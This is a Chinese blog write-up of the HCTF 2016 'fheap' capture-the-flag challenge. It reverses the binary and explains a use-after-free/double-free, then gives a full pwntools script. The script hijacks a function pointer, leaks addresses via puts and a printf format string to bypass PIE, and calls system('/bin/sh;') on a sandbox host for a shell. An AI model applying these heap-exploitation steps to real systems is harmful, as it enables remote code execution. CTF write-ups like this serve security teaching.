HCTF 2016 fheap 做题笔记

最新推荐文章于 2023-09-04 17:06:54 发布
最新推荐文章于 2023-09-04 17:06:54 发布
阅读量479 收藏 2
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/119799704
版权

前言

一道UAF题, HCTF 2016 - fheap

ctfhubfheap

过程

在这里插入图片描述

在这里插入图片描述

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char buf[1032]; // [rsp+0h] [rbp-410h] BYREF
  unsigned __int64 v5; // [rsp+408h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  puts("+++++++++++++++++++++++++++");
  puts("So, let's crash the world");
  puts("+++++++++++++++++++++++++++");
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        sub_114B();
        if ( !read(0, buf, 0x400uLL) )
          return 1LL;
        if ( strncmp(buf, "create ", 7uLL) )
          break;
        sub_EC8();
      }
      if ( strncmp(buf, "delete ", 7uLL) )
        break;
      sub_D95();
    }
    if ( !strncmp(buf, "quit ", 5uLL) )
      break;
    puts("Invalid cmd");
  }
  puts("Bye~");
  return 0LL;
}

分析create函数

    if ( read(0, buf, nbytes) == -1 )
    {
      puts("got elf!!");
      exit(1);
    }
    nbytesa = strlen(buf);
    if ( nbytesa > 0xF )
    {
      dest = malloc(nbytesa);
      if ( !dest )
      {
        puts("malloc faild!");
        exit(1);
      }
      strncpy(dest, buf, nbytesa);
      *ptr = dest;
      *(ptr + 3) = sub_D6C;
    }
    else
    {
      strncpy(ptr, buf, nbytesa);
      *(ptr + 3) = sub_D52;
    }
    *(ptr + 4) = nbytesa;

这一段描述程序接收str后的保存, 如果小于等于15字节用ptr所指地址保存, 否则申请更大的buf保存, 同时*(ptr + 3)*(ptr + 4)分别保存free函数(sub_D6C或者sub_D52) 和 字符串长度nbytesa
总结为

typedef struct Str{
	union{
		char *dest;
		char s[16];
	}str; // 24字节 (根据反编译结果判断 ptr, ptr+1, ptr+2用来保存string
	void (*free)(struct Str *ptr); // 8字节
	int len; // 4字节 实际占ptr + 4地址处8字节
}Str; // 40字节

往下分析

    for ( i = 0; i <= 15; ++i )
    {
      if ( !*(&unk_2020C0 + 4 * i) )
      {
        *(&unk_2020C0 + 4 * i) = 1;
        *(&unk_2020C0 + 2 * i + 1) = ptr;
        printf("The string id is %d\n", i);
        break;
      }
    }
    if ( i == 16 )
    {
      puts("The string list is full");
      (*(ptr + 3))(ptr);
    }

大概可以猜出这是strings的数组, 最多有16个string, 并且带有标志位, 1时为有效string, ptr为string的指针, 看反编译结果比较迷惑, 步长两个不一样, 应该是IDA分析结果有问题, 直接看汇编

lea     rax, unk_2020C0
mov     edx, [rbp+var_102C] # mov edx, i
movsxd  rdx, edx
shl     rdx, 4 # rdx = rdx*16
add     rax, rdx
mov     dword ptr [rax], 1
lea     rax, unk_2020C0
mov     edx, [rbp+var_102C]
movsxd  rdx, edx
shl     rdx, 4
add     rdx, rax
mov     rax, [rbp+ptr]
mov     [rdx+8], rax
mov     eax, [rbp+var_102C]
mov     esi, eax
lea     rdi, aTheStringIdIsD ; "The string id is %d\n"
mov     eax, 0
call    _printf
jmp     short loc_1109

所以步长应该是2, shl 4, 相当于*16, 两个字长, 所以标志位用一个字长保存, 指针用一个字长保存, 弄清之后恢复出来数据结构就是

struct{
	int tag;
	Str* ptr;
}Strs[16];

接着分析delete函数

  printf("Pls give me the string id you want to delete\nid:");
  v1 = sub_B65();
  if ( v1 < 0 || v1 > 16 )
    puts("Invalid id");
  if ( *(&unk_2020C0 + 2 * v1 + 1) )
  {
    printf("Are you sure?:");
    read(0, buf, 0x100uLL);
    if ( !strncmp(buf, "yes", 3uLL) )
    {
      (*(*(&unk_2020C0 + 2 * v1 + 1) + 24LL))(*(&unk_2020C0 + 2 * v1 + 1));
      *(&unk_2020C0 + 4 * v1) = 0;
    }
  }

这里有个比较隐蔽的double free, 结合前面的create流程可以构造一个UAF漏洞, 因为没有将指针置为null, 所以free chunk后可以再使用, 不过是覆盖函数指针ptr之后再delete, 这样可以实现特定函数调用

利用思路: 申请两个<16字节的chunk设为chunk1, chunk2, 依次释放chunk2, chunk1, 申请一个32字节的chunk, 传入的字符串会覆盖到原来chunk2的ptr指针处, 再次释放chunk2就可以调用ptr所指的函数
在这里插入图片描述

利用过程

(1)用puts函数泄露libc基址
(2)接着用printf函数构造格式化漏洞泄露system地址
(3)最后传入system地址, 字符串保存"/bin/sh\x00", 调用delete功能, 即可get shell

objdump -d pwn > pwn.txtdump出pwn的二进制数据

将free函数覆盖成puts, 打印出指令call 980的地址, 根据偏移980计算出程序加载基址(绕过 PIE), 计算出printf_plt地址后, 第二步调用printf_plt泄露system地址, 第三步调用system("/bin/sh\x00")
在这里插入图片描述
在这里插入图片描述

接下来是用DynELF泄露system地址, delete函数中的buf在栈上, 给buf按8字节对齐传入想要泄露的addr, 找到偏移量为9

得到system地址就完事

from pwn import *

url, port = "challenge-c8646496b7d6285e.sandbox.ctfhub.com", 23200
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

printf_plt = 0

def add_str(size, content):
    io.sendafter("quit\n", "create ")
    io.sendlineafter("size:", str(size))
    content = content.ljust(size, b'\x00')
    io.sendafter("str:", content)

def delete_str(idx):
    io.sendafter("quit\n", "delete ")
    io.sendlineafter("id:", str(idx))
    io.sendafter("sure?:", "yes")

def leak(addr):
    delete_str(0)
    payload = b"zz%9$s" + b"#" * (0x18 - len("zz%9$s")) + p64(printf_plt)
    add_str(0x20, payload)
    io.sendafter("quit\n", "delete ")
    io.sendlineafter("id:", "1")
    io.sendafter("sure?:", b"yeszzzzz" + p64(addr))
    io.recvuntil(b"zz")
    data = io.recvuntil("####")[:-4]
    data += b"\x00"
    return data

def pwn():
    global printf_plt

    add_str(8, b"1111")
    add_str(8, b"2222")
    add_str(8, b"3333")
    delete_str(2)
    delete_str(1)
    delete_str(0)

    payload = b"y" * 0x10 + b"z" * 0x8 + b"\x2d" + b"\x00"
    add_str(0x20, payload)
    delete_str(1)
    io.recvuntil(b"z" * 0x8)
    data = io.recvline()[:-1]
    if len(data) > 8: data = data[:8]
    data = u64(data.ljust(8, b'\x00'))

    process_base = data - 0xd2d
    print("process base address: ", process_base)
    printf_plt = process_base + 0x9d0

    delete_str(0)
    payload = b"y" * 0x10 + b"z" * 0x8 + b"\x2d" + b"\x00"
    add_str(0x20, payload)
    delete_str(1)

    dyn = DynELF(leak, process_base, elf = elf)
    system_addr = dyn.lookup("system", "libc")

    delete_str(0)
    payload = b"/bin/sh;".ljust(0x18, b"#") + p64(system_addr)
    add_str(0x20, payload)
    delete_str(1)
    io.interactive()

if __name__ == "__main__":
    pwn()

总结

难点

分析出double free漏洞
绕过PIE保护
定位格式化漏洞的偏移
泄露libc基址
本地不能调试

卡点

弄清相对偏移以确认程序基址卡住很长时间

ljust()的坑点
在python3下, 需要统一变量类型, 填充的对象和填充的字符需要统一类型, bytes对bytes, str对str
在这里插入图片描述
还有给system传入的字符串应该是"/bin/sh;"不是"/bin/sh\x00", 因为system执行的字符串不仅仅是/bin/sh, 还有跟在后面的其他字符, 所以需要;隔开表示这是一个完整命令

还有个坑点, 就是sendline和send的问题, 全部用sendline和全部都用send无法打通, 有的地方比较离谱, sendline能过, send就不行, 只能一个个试错了, 没有找到必过的规律, 太菜了T T

最后且重要的一点, 需要通过double free调用puts函数两次, 不然fastbins结构不对, 打不通
就是这里

    payload = b"y" * 0x10 + b"z" * 0x8 + b"\x2d" + b"\x00"
    add_str(0x20, payload)
    delete_str(1)
    io.recvuntil(b"z" * 0x8)
    data = io.recvline()[:-1]
    if len(data) > 8: data = data[:8]
    data = u64(data.ljust(8, b'\x00'))

    process_base = data - 0xd2d
    print("process base address: ", process_base)
    printf_plt = process_base + 0x9d0

    delete_str(0)
    payload = b"y" * 0x10 + b"z" * 0x8 + b"\x2d" + b"\x00"
    add_str(0x20, payload)
    delete_str(1)

(参考资料不够详细, 对萌新实在是灾难
花了7h才打通这题, 开荒阶段还是比较辛苦啊

参考

B站 星盟安全pwn教程

https://blog.csdn.net/qq_33528164/article/details/79515831

fa1c4
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016 hctf fheap
BadRer的博客
06-10 440
2016 hctf fheap 前言 好久没写东西了,本想着简单记录一下,不过在的时候,弄懂了之前困扰许多的问,所以就多写一些吧,在此感谢俺的女票@曙雀 UAF IDA分析后,得到数据结构如下。 note: 00000000 note struc ; (sizeof=0x20, mappedto_9) 00000000 content_ptr dq ? 00000008 field_8 dq ? 00000010 str_size dd ?
专插本2000笔记
04-29
备份自用
C语言目和笔记源码.zip
10-18
C语言目和笔记源码.zipC语言目和笔记源码.zipC语言目和笔记源码.zipC语言目和笔记源码.zipC语言目和笔记源码.zipC语言目和笔记源码.zipC语言目和笔记源码.zip
HCTF 2016 fheap
Bill
03-11 2045
HCTF 2016 fheap 一. 源码 fheap.c 二. 目分析 1. 程序的生成 假设我们的源码文件名叫fheap.c gcc fheap.c -pie -fpic -o fheap strip fheap 其中-fpic是辅助-pie, 没有-fpic将会编译失败. strip是去除符号表(Discard symbols from obje...
兵者多诡(HCTF2016)
最新发布
09-04 771
https://github.com/MartinxMax/CTFer_Zero_one
hctf2016_fheap
qq_53062301的博客
07-30 212
看的第二道堆目,也调试和想了很久,学了很多东西,这道也是一道uaf,从create函数中可以看到,如果申请的chunk>0xF就会申请两个chunk,其中一个是malloc(0x20),另一个是malloc(size),如果申请的chunk<0xF时,距离chunk头0x28的地方会存放着free函数的指针,可供用户自己输入的位置是距离chunk头0x10的位置,当delete时就会调用这个指针函数,目本身也只有create和delete这两个可用功能,checksec发现目开启了PIE
ctf xor_2016 HCTF Crypto 出总结
weixin_39935257的博客
12-19 609
Author:Hcamaeldate: 2016-11-28 20:26:26今年犯懒了所以只出了3RSA的密码学目, 出思路来源于协会上一届的学长 @Mystery Of Panda 关于RSA后门的毕业设计.Crypto So Interesting出时预测的分数在300分左右, 不过看完选手的wp后发现这出现了重大失误, 现在来看, 这只值150分左右, 但是实际情况只有23个队...
hctf2016-fheap
热门推荐
钞sir的博客
03-28 1万+
目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
leetcode笔记
02-11
leetcode笔记
李兴华2016年java课堂笔记
10-24
李兴华2016年java课堂笔记经典
php scrscriptipt,HCTF 2016 writeup——web篇
weixin_34366539的博客
03-19 318
了5个web,分享一下思路。。Level-11. 2099年的flag打开链接,提示需要ios99才能得到flag,源码的注释中提示要POST,那么就修改User-Agent头为ios的头,版本改成99就好了。Level-21. RESTFUL打开目链接链接,有这么一句{"message":""Please me some more than <12450>!""}很容易想到...
hctf2016_fheap(partial write)
seaaseesa的博客
06-10 556
hctf2016_fheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,add函数中,如果字符串长度大于15,则单独malloc一块内存存放字符串,否则直接存结点里。 Delete功能没有清空指针,因此,存在UAF, 我们可以第字节将节点里的free代理函数指针修改掉,利用低字节覆盖,使其指向printf函数plt表,这样,当我们用UAF去delete这个堆时,就会调用printf,这样我们可以利用格式化字符串去泄露数据。然后就可以利用UAF,去执行system函数了。
hctf2016[pwn]-fheap
CharlesGodX的博客
03-30 1579
0x00:前言 这道是一道堆栈混合加格式化字符串的目,目的利用点不错,很适合好好一遍。 0x01:目链接 https://github.com/zh-explorer/hctf2016-fheap 0x02:解思路 首先查看程序保护 root@Thunder_J-virtual-machine:~/桌面# checksec pwn-f [*] Checking for new vers...
DASCTF Sept X 浙江工业大学秋季挑战赛rsa1
a5555678744的博客
09-26 795
这道其实比较经典,最早应该是出现在2016年的HCTF,出的思路可以参照这篇博客 2016 HCTF Crypto 出总结 #! /usr/bin/env python # -*- coding: utf-8 -*- # from flag import get_flag from hashlib import sha512 import random from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long f
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 147
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3547
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3195
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3074
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3012
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
sql server2016 数据库应用与开发笔记
06-01
SQL Server 2016是Microsoft推出的一款关系型数据库管理系统,它提供了丰富的功能和工具,用于应用和开发。以下是一些笔记,希望对您有帮助: 1. 数据类型:SQL Server 2016支持多种数据类型,包括整型、浮点型、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值